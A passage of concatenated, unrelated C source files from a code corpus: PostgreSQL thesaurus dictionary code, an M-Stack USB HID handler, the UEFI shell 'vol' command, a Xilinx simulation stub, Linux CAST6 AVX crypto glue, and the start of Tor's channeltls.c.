(errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("multiple Dictionary parameters"))); subdictname = pstrdup(defGetString(defel)); } else { ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("unrecognized Thesaurus parameter: \"%s\"", defel->defname))); } } if (!fileloaded) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("missing DictFile parameter"))); if (!subdictname) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("missing Dictionary parameter"))); d->subdictOid = get_ts_dict_oid(stringToQualifiedNameList(subdictname), false); d->subdict = lookup_ts_dictionary_cache(d->subdictOid); compileTheLexeme(d); compileTheSubstitute(d); PG_RETURN_POINTER(d); } static LexemeInfo * findTheLexeme(DictThesaurus *d, char *lexeme) { TheLexeme key, *res; if (d->nwrds == 0) return NULL; key.lexeme = lexeme; key.entries = NULL; res = bsearch(&key, d->wrds, d->nwrds, sizeof(TheLexeme), cmpLexemeQ); if (res == NULL) return NULL; return res->entries; } static bool matchIdSubst(LexemeInfo *stored, uint32 idsubst) { bool res = true; if (stored) { res = false; for (; stored; stored = stored->nextvariant) if (stored->idsubst == idsubst) { res = true; break; } } return res; } static LexemeInfo * findVariant(LexemeInfo *in, LexemeInfo *stored, uint16 curpos, LexemeInfo **newin, int newn) { for (;;) { int i; LexemeInfo *ptr = newin[0]; for (i = 0; i < newn; i++) { while (newin[i] && newin[i]->idsubst < ptr->idsubst) newin[i] = newin[i]->nextentry; if (newin[i] == NULL) return in; if (newin[i]->idsubst > ptr->idsubst) { ptr = newin[i]; i = -1; continue; } while (newin[i]->idsubst == ptr->idsubst) { if (newin[i]->posinsubst == curpos && newin[i]->tnvariant == newn) { ptr = newin[i]; break; } newin[i] = newin[i]->nextentry; if (newin[i] == NULL) return in; } if (newin[i]->idsubst != ptr->idsubst) { ptr = newin[i]; i = -1; continue; } } if (i == newn && matchIdSubst(stored, ptr->idsubst) && (in == NULL || !matchIdSubst(in, ptr->idsubst))) { /* found */ ptr->nextvariant = in; in = ptr; } /* step forward */ for (i = 0; i < newn; i++) newin[i] = newin[i]->nextentry; } } static TSLexeme * copyTSLexeme(TheSubstitute *ts) { TSLexeme *res; uint16 i; res = (TSLexeme *) palloc(sizeof(TSLexeme) * (ts->reslen + 1)); for (i = 0; i < ts->reslen; i++) { res[i] = ts->res[i]; res[i].lexeme = pstrdup(ts->res[i].lexeme); } res[ts->reslen].lexeme = NULL; return res; } static TSLexeme * checkMatch(DictThesaurus *d, LexemeInfo *info, uint16 curpos, bool *moreres) { *moreres = false; while (info) { Assert(info->idsubst < d->nsubst); if (info->nextvariant) *moreres = true; if (d->subst[info->idsubst].lastlexeme == curpos) return copyTSLexeme(d->subst + info->idsubst); info = info->nextvariant; } return NULL; } Datum thesaurus_lexize(PG_FUNCTION_ARGS) { DictThesaurus *d = (DictThesaurus *) PG_GETARG_POINTER(0); DictSubState *dstate = (DictSubState *) PG_GETARG_POINTER(3); TSLexeme *res = NULL; LexemeInfo *stored, *info = NULL; uint16 curpos = 0; bool moreres = false; if (PG_NARGS() != 4 || dstate == NULL) elog(ERROR, "forbidden call of thesaurus or nested call"); if (dstate->isend) PG_RETURN_POINTER(NULL); stored = (LexemeInfo *) dstate->private_state; if (stored) curpos = stored->posinsubst + 1; if (!d->subdict->isvalid) d->subdict = lookup_ts_dictionary_cache(d->subdictOid); res = (TSLexeme *) DatumGetPointer(FunctionCall4(&(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PG_GETARG_DATUM(1), PG_GETARG_DATUM(2), PointerGetDatum(NULL))); if (res && res->lexeme) { TSLexeme *ptr = res, *basevar; while (ptr->lexeme) { uint16 nv = ptr->nvariant; uint16 i, nlex = 0; LexemeInfo **infos; basevar = ptr; while (ptr->lexeme && nv == ptr->nvariant) { nlex++; ptr++; } infos = (LexemeInfo **) palloc(sizeof(LexemeInfo *) * nlex); for (i = 0; i < nlex; i++) if ((infos[i] = findTheLexeme(d, basevar[i].lexeme)) == NULL) break; if (i < nlex) { /* no chance to find */ pfree(infos); continue; } info = findVariant(info, stored, curpos, infos, nlex); } } else if (res) { /* stop-word */ LexemeInfo *infos = findTheLexeme(d, NULL); info = findVariant(NULL, stored, curpos, &infos, 1); } else { info = NULL; /* word isn't recognized */ } dstate->private_state = (void *) info; if (!info) { dstate->getnext = false; PG_RETURN_POINTER(NULL); } if ((res = checkMatch(d, info, curpos, &moreres)) != NULL) { dstate->getnext = moreres; PG_RETURN_POINTER(res); } dstate->getnext = true; PG_RETURN_POINTER(NULL); }
137135.c
/* * M-Stack USB Device Stack Implementation * Copyright (C) 2013 Alan Ott <alan@signal11.us> * Copyright (C) 2013 Signal 11 Software * * Initial version for PIC18, 2008-02-24 * PIC24 port, 2013-08-13 * * M-Stack is free software: you can redistribute it and/or modify it under * the terms of the GNU Lesser General Public License as published by the * Free Software Foundation, version 3; or the Apache License, version 2.0 * as published by the Apache Software Foundation. If you have purchased a * commercial license for this software from Signal 11 Software, your * commerical license superceeds the information in this header. * * M-Stack is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public * License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this software. If not, see <http://www.gnu.org/licenses/>. * * You should have received a copy of the Apache License, verion 2.0 along * with this software. If not, see <http://www.apache.org/licenses/>. */ #include <usb_config.h> #include <usb_ch9.h> #include <usb.h> #include <usb_hid.h> #define MIN(x,y) (((x)<(y))?(x):(y)) STATIC_SIZE_CHECK_EQUAL(sizeof(struct hid_descriptor), 9); STATIC_SIZE_CHECK_EQUAL(sizeof(struct hid_optional_descriptor), 3); #ifdef MULTI_CLASS_DEVICE static uint8_t *hid_interfaces; static uint8_t num_hid_interfaces; void hid_set_interface_list(uint8_t *interfaces, uint8_t num_interfaces) { hid_interfaces = interfaces; num_hid_interfaces = num_interfaces; } #endif uint8_t process_hid_setup_request(const struct setup_packet *setup) { /* The following comes from the HID spec 1.11, section 7.1.1 */ uint8_t interface = setup->wIndex; #ifdef MULTI_CLASS_DEVICE /* Check the interface first to make sure the destination is a * HID interface. Composite devices will need to call * hid_set_interface_list() first. */ uint8_t i; for (i = 0; i < num_hid_interfaces; i++) { if (interface == hid_interfaces[i]) break; } /* Return if interface is not in the list of HID interfaces. */ if (i == num_hid_interfaces) return -1; #endif if (setup->bRequest == GET_DESCRIPTOR && setup->REQUEST.bmRequestType == 0x81) { uint8_t descriptor = ((setup->wValue >> 8) & 0x00ff); const void *desc; int16_t len = -1; if (descriptor == DESC_HID) { len = USB_HID_DESCRIPTOR_FUNC(interface, &desc); } else if (descriptor == DESC_REPORT) { len = USB_HID_REPORT_DESCRIPTOR_FUNC(interface, &desc); } #ifdef USB_HID_PHYSICAL_DESCRIPTOR_FUNC else if (descriptor == DESC_PHYSICAL) { uint8_t descriptor_index = setup->wValue & 0x00ff; len = USB_HID_PHYSICAL_DESCRIPTOR_FUNC(interface, descriptor_index, &desc); } #endif if (len < 0) return -1; usb_send_data_stage((void*) desc, min(len, setup->wLength), NULL, NULL); return 0; } /* No support for Set_Descriptor */ #ifdef HID_GET_REPORT_CALLBACK const void *desc; int16_t len = -1; usb_ep0_data_stage_callback callback; void *context; if (setup->bRequest == HID_GET_REPORT && setup->REQUEST.bmRequestType == 0xa1) { uint8_t report_type = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; len = HID_GET_REPORT_CALLBACK(interface/*interface*/, report_type, report_id, &desc, &callback, &context); if (len < 0) return -1; usb_send_data_stage((void*)desc, min(len, setup->wLength), callback, context); return 0; } #endif #ifdef HID_SET_REPORT_CALLBACK if (setup->bRequest == HID_SET_REPORT && setup->REQUEST.bmRequestType == 0x21) { uint8_t report_type = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; int8_t res = HID_SET_REPORT_CALLBACK(interface, report_type, report_id); return res; } #endif #ifdef HID_GET_IDLE_CALLBACK if (setup->bRequest == HID_GET_IDLE && setup->REQUEST.bmRequestType == 0xa1) { uint8_t report_id = setup->wValue & 0x00ff; uint8_t res = HID_GET_IDLE_CALLBACK(interface, report_id); usb_send_data_stage((char*)&res, 1, NULL, NULL); return 0; } #endif #ifdef HID_SET_IDLE_CALLBACK if (setup->bRequest == HID_SET_IDLE && setup->REQUEST.bmRequestType == 0x21) { uint8_t duration = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; uint8_t res = HID_SET_IDLE_CALLBACK(interface, report_id, duration); return res; } #endif #ifdef HID_GET_PROTOCOL_CALLBACK if (setup->bRequest == HID_GET_PROTOCOL && setup->REQUEST.bmRequestType == 0xa1) { int8_t res = HID_GET_PROTOCOL_CALLBACK(interface); if (res < 0) return -1; usb_send_data_stage((char*)&res, 1, NULL, NULL); return 0; } #endif #ifdef HID_SET_PROTOCOL_CALLBACK if (setup->bRequest == HID_SET_PROTOCOL && setup->REQUEST.bmRequestType == 0x21) { int8_t res = HID_SET_PROTOCOL_CALLBACK(interface, setup->wValue); return res; } #endif return -1; }
110673.c
/** @file Main file for vol shell level 2 function. (C) Copyright 2015 Hewlett-Packard Development Company, L.P.<BR> Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR> This program and the accompanying materials are licensed and made available under the terms and conditions of the BSD License which accompanies this distribution. The full text of the license may be found at http://opensource.org/licenses/bsd-license.php THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. **/ #include "UefiShellLevel2CommandsLib.h" #include <Guid/FileSystemInfo.h> #include <Guid/FileSystemVolumeLabelInfo.h> /** Print the info or change the volume info. @param[in] Path String with starting path. @param[in] Delete TRUE to delete the volume label. FALSE otherwise. @param[in] Name New name to set to the volume label. @retval SHELL_SUCCESS The operation was sucessful. **/ SHELL_STATUS HandleVol( IN CONST CHAR16 *Path, IN CONST BOOLEAN Delete, IN CONST CHAR16 *Name OPTIONAL ) { EFI_STATUS Status; SHELL_STATUS ShellStatus; EFI_FILE_SYSTEM_INFO *SysInfo; UINTN SysInfoSize; SHELL_FILE_HANDLE ShellFileHandle; EFI_FILE_PROTOCOL *EfiFpHandle; UINTN Size1; UINTN Size2; ShellStatus = SHELL_SUCCESS; if ( Name != NULL && ( StrStr(Name, L"%") != NULL || StrStr(Name, L"^") != NULL || StrStr(Name, L"*") != NULL || StrStr(Name, L"+") != NULL || StrStr(Name, L"=") != NULL || StrStr(Name, L"[") != NULL || StrStr(Name, L"]") != NULL || StrStr(Name, L"|") != NULL || StrStr(Name, L":") != NULL || StrStr(Name, L";") != NULL || StrStr(Name, L"\"") != NULL || StrStr(Name, L"<") != NULL || StrStr(Name, L">") != NULL || StrStr(Name, L"?") != NULL || StrStr(Name, L"/") != NULL || StrStr(Name, L" ") != NULL ) ){ ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PARAM_INV), gShellLevel2HiiHandle, L"vol", Name); return (SHELL_INVALID_PARAMETER); } Status = gEfiShellProtocol->OpenFileByName( Path, &ShellFileHandle, Name != NULL?EFI_FILE_MODE_READ|EFI_FILE_MODE_WRITE:EFI_FILE_MODE_READ); if (EFI_ERROR(Status) || ShellFileHandle == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_FILE_OPEN_FAIL), gShellLevel2HiiHandle, L"vol", Path); return (SHELL_ACCESS_DENIED); } // // Get the Volume Info from ShellFileHandle // SysInfo = NULL; SysInfoSize = 0; EfiFpHandle = ConvertShellHandleToEfiFileProtocol(ShellFileHandle); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); if (Status == EFI_BUFFER_TOO_SMALL) { SysInfo = AllocateZeroPool(SysInfoSize); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); } ASSERT(SysInfo != NULL); if (Delete) { *((CHAR16 *) SysInfo->VolumeLabel) = CHAR_NULL; SysInfo->Size = SIZE_OF_EFI_FILE_SYSTEM_INFO + StrSize(SysInfo->VolumeLabel); Status = EfiFpHandle->SetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, (UINTN)SysInfo->Size, SysInfo); } else if (Name != NULL) { Size1 = StrSize(Name); Size2 = StrSize(SysInfo->VolumeLabel); if (Size1 > Size2) { SysInfo = ReallocatePool((UINTN)SysInfo->Size, (UINTN)SysInfo->Size + Size1 - Size2, SysInfo); if (SysInfo == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_OUT_MEM), gShellLevel2HiiHandle, L"vol"); ShellStatus = SHELL_OUT_OF_RESOURCES; } } if (SysInfo != NULL) { StrCpyS ( (CHAR16 *) SysInfo->VolumeLabel, (Size1>Size2? Size1/sizeof(CHAR16) : Size2/sizeof(CHAR16)), Name ); SysInfo->Size = SIZE_OF_EFI_FILE_SYSTEM_INFO + Size1; Status = EfiFpHandle->SetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, (UINTN)SysInfo->Size, SysInfo); } } FreePool(SysInfo); if (Delete || Name != NULL) { if (EFI_ERROR(Status)) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_FILE_AD), gShellLevel2HiiHandle, L"vol", Path); ShellStatus = SHELL_ACCESS_DENIED; } } SysInfoSize = 0; SysInfo = NULL; Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); if (Status == EFI_BUFFER_TOO_SMALL) { SysInfo = AllocateZeroPool(SysInfoSize); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); } gEfiShellProtocol->CloseFile(ShellFileHandle); ASSERT(SysInfo != NULL); if (SysInfo != NULL) { // // print VolumeInfo table // ShellPrintHiiEx ( 0, gST->ConOut->Mode->CursorRow, NULL, STRING_TOKEN (STR_VOL_VOLINFO), gShellLevel2HiiHandle, SysInfo->VolumeLabel, SysInfo->ReadOnly?L"r":L"rw", SysInfo->VolumeSize, SysInfo->FreeSpace, SysInfo->BlockSize ); SHELL_FREE_NON_NULL(SysInfo); } return (ShellStatus); } STATIC CONST SHELL_PARAM_ITEM ParamList[] = { {L"-d", TypeFlag}, {L"-n", TypeValue}, {NULL, TypeMax} }; /** Function for 'Vol' command. @param[in] ImageHandle Handle to the Image (NULL if Internal). @param[in] SystemTable Pointer to the System Table (NULL if Internal). **/ SHELL_STATUS EFIAPI ShellCommandRunVol ( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable ) { EFI_STATUS Status; LIST_ENTRY *Package; CHAR16 *ProblemParam; SHELL_STATUS ShellStatus; CONST CHAR16 *PathName; CONST CHAR16 *CurDir; BOOLEAN DeleteMode; CHAR16 *FullPath; CHAR16 *TempSpot; UINTN Length; CONST CHAR16 *NewName; Length = 0; ProblemParam = NULL; ShellStatus = SHELL_SUCCESS; PathName = NULL; CurDir = NULL; FullPath = NULL; // // initialize the shell lib (we must be in non-auto-init...) // Status = ShellInitialize(); ASSERT_EFI_ERROR(Status); // // Fix local copies of the protocol pointers // Status = CommandInit(); ASSERT_EFI_ERROR(Status); // // parse the command line // Status = ShellCommandLineParse (ParamList, &Package, &ProblemParam, TRUE); if (EFI_ERROR(Status)) { if (Status == EFI_VOLUME_CORRUPTED && ProblemParam != NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PROBLEM), gShellLevel2HiiHandle, L"vol", ProblemParam); FreePool(ProblemParam); ShellStatus = SHELL_INVALID_PARAMETER; } else { ASSERT(FALSE); } } else { // // check for "-?" // if (ShellCommandLineGetFlag(Package, L"-?")) { ASSERT(FALSE); } if (ShellCommandLineGetCount(Package) > 2) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_TOO_MANY), gShellLevel2HiiHandle, L"vol"); ShellStatus = SHELL_INVALID_PARAMETER; } else { PathName = ShellCommandLineGetRawValue(Package, 1); if (PathName == NULL) { CurDir = gEfiShellProtocol->GetCurDir(NULL); if (CurDir == NULL) { ShellStatus = SHELL_NOT_FOUND; ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_NO_CWD), gShellLevel2HiiHandle, L"vol"); } else { PathName = CurDir; } } if (PathName != NULL) { TempSpot = StrStr(PathName, L":"); if (TempSpot != NULL) { *TempSpot = CHAR_NULL; } TempSpot = StrStr(PathName, L"\\"); if (TempSpot != NULL) { *TempSpot = CHAR_NULL; } StrnCatGrow(&FullPath, &Length, PathName, 0); StrnCatGrow(&FullPath, &Length, L":\\", 0); DeleteMode = ShellCommandLineGetFlag(Package, L"-d"); NewName = ShellCommandLineGetValue(Package, L"-n"); if (DeleteMode && ShellCommandLineGetFlag(Package, L"-n")) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PARAM_CONFLICT), gShellLevel2HiiHandle, L"vol", L"-d", L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (ShellCommandLineGetFlag(Package, L"-n") && NewName == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_NO_VALUE), gShellLevel2HiiHandle, L"vol", L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (NewName != NULL && StrLen(NewName) > 11) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PROBLEM_VAL), gShellLevel2HiiHandle, L"vol", NewName, L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (ShellStatus == SHELL_SUCCESS) { ShellStatus = HandleVol( FullPath, DeleteMode, NewName ); } } } } SHELL_FREE_NON_NULL(FullPath); // // free the command line package // ShellCommandLineFreeVarList (Package); return (ShellStatus); }
350421.c
/**********************************************************************/ /* ____ ____ */ /* / /\/ / */ /* /___/ \ / */ /* \ \ \/ */ /* \ \ Copyright (c) 2003-2009 Xilinx, Inc. */ /* / / All Right Reserved. */ /* /---/ /\ */ /* \ \ / \ */ /* \___\/\___\ */ /***********************************************************************/ #include "xsi.h" struct XSI_INFO xsi_info; char *IEEE_P_2592010699; char *IEEE_P_1242562249; char *STD_STANDARD; int main(int argc, char **argv) { xsi_init_design(argc, argv); xsi_register_info(&xsi_info); xsi_register_min_prec_unit(-12); ieee_p_2592010699_init(); ieee_p_1242562249_init(); work_a_1071152751_3212880686_init(); work_a_0918718219_3212880686_init(); work_a_1652397429_3212880686_init(); work_a_0719060090_2372691052_init(); xsi_register_tops("work_a_0719060090_2372691052"); IEEE_P_2592010699 = xsi_get_engine_memory("ieee_p_2592010699"); xsi_register_ieee_std_logic_1164(IEEE_P_2592010699); IEEE_P_1242562249 = xsi_get_engine_memory("ieee_p_1242562249"); STD_STANDARD = xsi_get_engine_memory("std_standard"); return xsi_run_simulation(argc, argv); }
942856.c
// SPDX-License-Identifier: GPL-2.0-or-later /* * Glue Code for the AVX assembler implementation of the Cast6 Cipher * * Copyright (C) 2012 Johannes Goetzfried * <Johannes.Goetzfried@informatik.stud.uni-erlangen.de> * * Copyright © 2013 Jussi Kivilinna <jussi.kivilinna@iki.fi> */ #include <linux/module.h> #include <linux/types.h> #include <linux/crypto.h> #include <linux/err.h> #include <crypto/algapi.h> #include <crypto/cast6.h> #include <crypto/internal/simd.h> #include "ecb_cbc_helpers.h" #define CAST6_PARALLEL_BLOCKS 8 asmlinkage void cast6_ecb_enc_8way(const void *ctx, u8 *dst, const u8 *src); asmlinkage void cast6_ecb_dec_8way(const void *ctx, u8 *dst, const u8 *src); asmlinkage void cast6_cbc_dec_8way(const void *ctx, u8 *dst, const u8 *src); static int cast6_setkey_skcipher(struct crypto_skcipher *tfm, const u8 *key, unsigned int keylen) { return cast6_setkey(&tfm->base, key, keylen); } static int ecb_encrypt(struct skcipher_request *req) { ECB_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); ECB_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_ecb_enc_8way); ECB_BLOCK(1, __cast6_encrypt); ECB_WALK_END(); } static int ecb_decrypt(struct skcipher_request *req) { ECB_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); ECB_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_ecb_dec_8way); ECB_BLOCK(1, __cast6_decrypt); ECB_WALK_END(); } static int cbc_encrypt(struct skcipher_request *req) { CBC_WALK_START(req, CAST6_BLOCK_SIZE, -1); CBC_ENC_BLOCK(__cast6_encrypt); CBC_WALK_END(); } static int cbc_decrypt(struct skcipher_request *req) { CBC_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); CBC_DEC_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_cbc_dec_8way); CBC_DEC_BLOCK(1, __cast6_decrypt); CBC_WALK_END(); } static struct skcipher_alg cast6_algs[] = { { .base.cra_name = "__ecb(cast6)", .base.cra_driver_name = "__ecb-cast6-avx", .base.cra_priority = 200, .base.cra_flags = CRYPTO_ALG_INTERNAL, .base.cra_blocksize = CAST6_BLOCK_SIZE, .base.cra_ctxsize = sizeof(struct cast6_ctx), .base.cra_module = THIS_MODULE, .min_keysize = CAST6_MIN_KEY_SIZE, .max_keysize = CAST6_MAX_KEY_SIZE, .setkey = cast6_setkey_skcipher, .encrypt = ecb_encrypt, .decrypt = ecb_decrypt, }, { .base.cra_name = "__cbc(cast6)", .base.cra_driver_name = "__cbc-cast6-avx", .base.cra_priority = 200, .base.cra_flags = CRYPTO_ALG_INTERNAL, .base.cra_blocksize = CAST6_BLOCK_SIZE, .base.cra_ctxsize = sizeof(struct cast6_ctx), .base.cra_module = THIS_MODULE, .min_keysize = CAST6_MIN_KEY_SIZE, .max_keysize = CAST6_MAX_KEY_SIZE, .ivsize = CAST6_BLOCK_SIZE, .setkey = cast6_setkey_skcipher, .encrypt = cbc_encrypt, .decrypt = cbc_decrypt, }, }; static struct simd_skcipher_alg *cast6_simd_algs[ARRAY_SIZE(cast6_algs)]; static int __init cast6_init(void) { const char *feature_name; if (!cpu_has_xfeatures(XFEATURE_MASK_SSE | XFEATURE_MASK_YMM, &feature_name)) { pr_info("CPU feature '%s' is not supported.\n", feature_name); return -ENODEV; } return simd_register_skciphers_compat(cast6_algs, ARRAY_SIZE(cast6_algs), cast6_simd_algs); } static void __exit cast6_exit(void) { simd_unregister_skciphers(cast6_algs, ARRAY_SIZE(cast6_algs), cast6_simd_algs); } module_init(cast6_init); module_exit(cast6_exit); MODULE_DESCRIPTION("Cast6 Cipher Algorithm, AVX optimized"); MODULE_LICENSE("GPL"); MODULE_ALIAS_CRYPTO("cast6");
377367.c
/* * Copyright (c) 2012-2013, The Tor Project, Inc. */ /* See LICENSE for licensing information */ /** * \file channeltls.c * \brief channel_t concrete subclass using or_connection_t **/ /* * Define this so channel.h gives us things only channel_t subclasses * should touch. */ #define TOR_CHANNEL_INTERNAL_ #include "or.h" #include "channel.h" #include "channeltls.h" #include "circuitmux.h" #include "circuitmux_ewma.h" #include "config.h" #include "connection.h" #include "connection_or.h" #include "control.h" #include "hibernate.h" #include "main.h" #include "relay.h" #include "router.h" #include "routerlist.h" /** How many CELL_PADDING cells have we received, ever? */ uint64_t stats_n_padding_cells_processed = 0; /** How many CELL_VERSIONS cells have we received, ever? */ uint64_t stats_n_versions_cells_processed = 0; /** How many CELL_NETINFO cells have we received, ever? */ uint64_t stats_n_netinfo_cells_processed = 0; /** How many CELL_VPADDING cells have we received, ever? */ uint64_t stats_n_vpadding_cells_processed = 0; /** How many CELL_CERTS cells have we received, ever? */ uint64_t stats_n_certs_cells_processed = 0; /** How many CELL_AUTH_CHALLENGE cells have we received, ever? */ uint64_t stats_n_auth_challenge_cells_processed = 0; /** How many CELL_AUTHENTICATE cells have we received, ever? */ uint64_t stats_n_authenticate_cells_processed = 0; /** How many CELL_AUTHORIZE cells have we received, ever? */ uint64_t stats_n_authorize_cells_processed = 0; /** Active listener, if any */ channel_listener_t *channel_tls_listener = NULL; /* Utility function declarations */ static void channel_tls_common_init(channel_tls_t *tlschan); /* channel_tls_t method declarations */ static void channel_tls_close_method(channel_t *chan); static const char * channel_tls_describe_transport_method(channel_t *chan); static void channel_tls_free_method(channel_t *chan); static int channel_tls_get_remote_addr_method(channel_t *chan, tor_addr_t *addr_out); static int channel_tls_get_transport_name_method(channel_t *chan, char **transport_out); static const char * channel_tls_get_remote_descr_method(channel_t *chan, int flags); static int channel_tls_has_queued_writes_method(channel_t *chan); static int channel_tls_is_canonical_method(channel_t *chan, int req); static int channel_tls_matches_extend_info_method(channel_t *chan, extend_info_t *extend_info); static int channel_tls_matches_target_method(channel_t *chan, const tor_addr_t *target); static int channel_tls_write_cell_method(channel_t *chan, cell_t *cell, circuit_t *circ); static int channel_tls_write_packed_cell_method(channel_t *chan, or_connection_t *conn, circuit_t *circ, packed_cell_t *packed_cell); static int channel_tls_write_var_cell_method(channel_t *chan, var_cell_t *var_cell, circuit_t *circ); /* channel_listener_tls_t method declarations */ static void channel_tls_listener_close_method(channel_listener_t *chan_l); static const char * channel_tls_listener_describe_transport_method(channel_listener_t *chan_l); /** Handle incoming cells for the handshake stuff here rather than * passing them on up. */ static void channel_tls_process_versions_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_netinfo_cell(cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_certs_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_auth_challenge_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_authenticate_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static int command_allowed_before_handshake(uint8_t command); static int enter_v3_handshake_with_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); /** * Do parts of channel_tls_t initialization common to channel_tls_connect() * and channel_tls_handle_incoming(). */ static void channel_tls_common_init(channel_tls_t *tlschan) { channel_t *chan; tor_assert(tlschan); chan = &(tlschan->base_); channel_init(chan); chan->magic = TLS_CHAN_MAGIC; chan->type = CHANNEL_TYPE_TLS; chan->state = CHANNEL_STATE_OPENING; chan->close = channel_tls_close_method; chan->describe_transport = channel_tls_describe_transport_method; chan->free = channel_tls_free_method; chan->get_remote_addr = channel_tls_get_remote_addr_method; chan->get_remote_descr = channel_tls_get_remote_descr_method; chan->get_transport_name = channel_tls_get_transport_name_method; chan->has_queued_writes = channel_tls_has_queued_writes_method; chan->is_canonical = channel_tls_is_canonical_method; chan->matches_extend_info = channel_tls_matches_extend_info_method; chan->matches_target = channel_tls_matches_target_method; chan->write_cell = channel_tls_write_cell_method; chan->write_packed_cell = channel_tls_write_packed_cell_method; chan->write_var_cell = channel_tls_write_var_cell_method; chan->cmux = circuitmux_alloc(); if (cell_ewma_enabled()) { circuitmux_set_policy(chan->cmux, &ewma_policy); } } /** * Start a new TLS channel * * Launch a new OR connection to <b>addr</b>:<b>port</b> and expect to * handshake with an OR with identity digest <b>id_digest</b>, and wrap * it in a channel_tls_t. */ channel_t * channel_tls_connect(const tor_addr_t *addr, uint16_t port, const char *id_digest) { channel_tls_t *tlschan = tor_malloc_zero(sizeof(*tlschan)); channel_t *chan = &(tlschan->base_); channel_tls_common_init(tlschan); log_debug(LD_CHANNEL, "In channel_tls_connect() for channel %p " "(global id " U64_FORMAT ")", tlschan, U64_PRINTF_ARG(chan->global_identifier)); if (is_local_addr(addr)) channel_mark_local(chan); channel_mark_outgoing(chan); /* Set up or_connection stuff */ tlschan->conn = connection_or_connect(addr, port, id_digest, chan); /* connection_or_connect() will fill in tlschan->conn */ if (!(tlschan->conn)) { chan->reason_for_closing = CHANNEL_CLOSE_FOR_ERROR; channel_change_state(chan, CHANNEL_STATE_ERROR); goto err; } log_debug(LD_CHANNEL, "Got orconn %p for channel with global id " U64_FORMAT, tlschan->conn, U64_PRINTF_ARG(chan->global_identifier)); goto done; err: circuitmux_free(chan->cmux); tor_free(tlschan); chan = NULL; done: /* If we got one, we should register it */ if (chan) channel_register(chan); return chan; } /** * Return the current channel_tls_t listener * * Returns the current channel listener for incoming TLS connections, or * NULL if none has been established */ channel_listener_t * channel_tls_get_listener(void) { return channel_tls_listener; } /** * Start a channel_tls_t listener if necessary * * Return the current channel_tls_t listener, or start one if we haven't yet, * and return that. */ channel_listener_t * channel_tls_start_listener(void) { channel_listener_t *listener; if (!channel_tls_listener) { listener = tor_malloc_zero(sizeof(*listener)); channel_init_listener(listener); listener->state = CHANNEL_LISTENER_STATE_LISTENING; listener->close = channel_tls_listener_close_method; listener->describe_transport = channel_tls_listener_describe_transport_method; channel_tls_listener = listener; log_debug(LD_CHANNEL, "Starting TLS channel listener %p with global id " U64_FORMAT, listener, U64_PRINTF_ARG(listener->global_identifier)); channel_listener_register(listener); } else listener = channel_tls_listener; return listener; } /** * Free everything on shutdown * * Not much to do here, since channel_free_all() takes care of a lot, but let's * get rid of the listener. */ void channel_tls_free_all(void) { channel_listener_t *old_listener = NULL; log_debug(LD_CHANNEL, "Shutting down TLS channels..."); if (channel_tls_listener) { /* * When we close it, channel_tls_listener will get nulled out, so save * a pointer so we can free it. */ old_listener = channel_tls_listener; log_debug(LD_CHANNEL, "Closing channel_tls_listener with ID " U64_FORMAT " at %p.", U64_PRINTF_ARG(old_listener->global_identifier), old_listener); channel_listener_unregister(old_listener); channel_listener_mark_for_close(old_listener); channel_listener_free(old_listener); tor_assert(channel_tls_listener == NULL); } 